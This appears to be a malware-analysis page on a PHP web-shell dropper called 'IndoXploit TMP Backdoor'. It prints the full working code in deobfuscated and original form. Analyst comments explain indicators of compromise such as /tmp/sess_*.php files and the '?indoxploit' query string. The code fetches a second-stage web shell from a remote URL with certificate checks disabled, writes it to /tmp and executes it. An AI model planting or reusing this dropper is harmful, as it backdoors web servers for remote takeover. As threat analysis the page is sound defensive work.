PHP Malware Analysis


Filename: tmp-shell.php

Tags

URLs

Deobfuscated code

<?php

# IndoXploit TMP Backdoor
# Bypass 406 Not Acceptable & Auto Delete Shell (WAF Evasion Shell)
# Coded by: L0c4lh34rtz - IndoXploit
# Analyst note: first-stage dropper. $data[0] is the remote second-stage
# payload URL; $data[1] is the local drop path, /tmp/sess_<md5 of the Host
# header>.php. The sess_ prefix resembles PHP's session-file naming, but
# genuine session files carry no .php extension, so a sess_*.php file under
# /tmp is a useful hunting indicator.
# NOTE(review): the header advertises "Auto Delete", but nothing in this
# listing removes any file; whether the downloaded payload does so cannot be
# verified from this page.
$data = ['https://raw.githubusercontent.com/indoxploit-coders/indoxploit-shell/master/shell-v3.php', '/tmp/sess_' . md5($_SERVER['HTTP_HOST']) . '.php'];
# Cached path: when the drop file already exists and is non-empty, it is
# executed inside this request via include.
if (file_exists($data[1]) && filesize($data[1]) !== 0) {
    include $data[1];
} else {
    # First run, or the drop file is empty: 'w+' creates/truncates the file and
    # whatever get() returns is written into it. This is the point where the
    # web server itself makes an outbound HTTPS request to the URL in $data[0],
    # which should be visible in egress or proxy logs.
    $fopen = fopen($data[1], 'w+');
    fwrite($fopen, get($data[0]));
    fclose($fopen);
    # Client-side redirect back to this script with the "?indoxploit" query
    # string, so the follow-up request takes the include branch. That literal
    # query string in access logs is a further indicator.
    echo "<script>window.location=\"?indoxploit\";</script>";
}
# Analyst note: fetches $url with cURL and returns the result of curl_exec().
# With CURLOPT_RETURNTRANSFER enabled that is the response body as a string,
# or false when the transfer fails.
function get($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($ch, CURLOPT_URL, $url);
    # Both TLS certificate checks are switched off: the origin of the downloaded
    # code is never authenticated, and the fetch will not fail behind a
    # TLS-inspecting proxy (where the request can therefore still be observed).
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    return curl_exec($ch);
}


Original code

<?php
# IndoXploit TMP Backdoor
# Bypass 406 Not Acceptable & Auto Delete Shell (WAF Evasion Shell)
# Coded by: L0c4lh34rtz - IndoXploit

# Analyst note: first-stage dropper. $data[0] is the remote second-stage
# payload URL; $data[1] is the local drop path, /tmp/sess_<md5 of the Host
# header>.php. The sess_ prefix resembles PHP's session-file naming, but
# genuine session files carry no .php extension, so a sess_*.php file under
# /tmp is a useful hunting indicator.
# NOTE(review): the header advertises "Auto Delete", but nothing in this
# listing removes any file; whether the downloaded payload does so cannot be
# verified from this page.
$data = ['https://raw.githubusercontent.com/indoxploit-coders/indoxploit-shell/master/shell-v3.php', '/tmp/sess_'.md5($_SERVER['HTTP_HOST']).'.php'];

# Cached path: when the drop file already exists and is non-empty, it is
# executed inside this request via include.
if(file_exists($data[1]) && filesize($data[1]) !== 0) {
    include($data[1]);
} else {
    # First run, or the drop file is empty: 'w+' creates/truncates the file and
    # whatever get() returns is written into it. This is the point where the
    # web server itself makes an outbound HTTPS request to the URL in $data[0],
    # which should be visible in egress or proxy logs.
    $fopen = fopen($data[1], 'w+');
    fwrite($fopen, get($data[0]));
    fclose($fopen);
    # Client-side redirect back to this script with the "?indoxploit" query
    # string, so the follow-up request takes the include branch. That literal
    # query string in access logs is a further indicator.
    echo '<script>window.location="?indoxploit";</script>';
}

# Analyst note: fetches $url with cURL and returns the result of curl_exec().
# With CURLOPT_RETURNTRANSFER enabled that is the response body as a string,
# or false when the transfer fails.
function get($url) {
    $ch = curl_init();
          curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
          curl_setopt($ch, CURLOPT_URL, $url);
          # Both TLS certificate checks are switched off: the origin of the
          # downloaded code is never authenticated, and the fetch will not fail
          # behind a TLS-inspecting proxy (where the request can therefore
          # still be observed).
          curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
          curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    return curl_exec($ch);
          # Unreachable: this call sits after the return statement, so the
          # handle is never explicitly closed by this function.
          curl_close($ch);
}
?>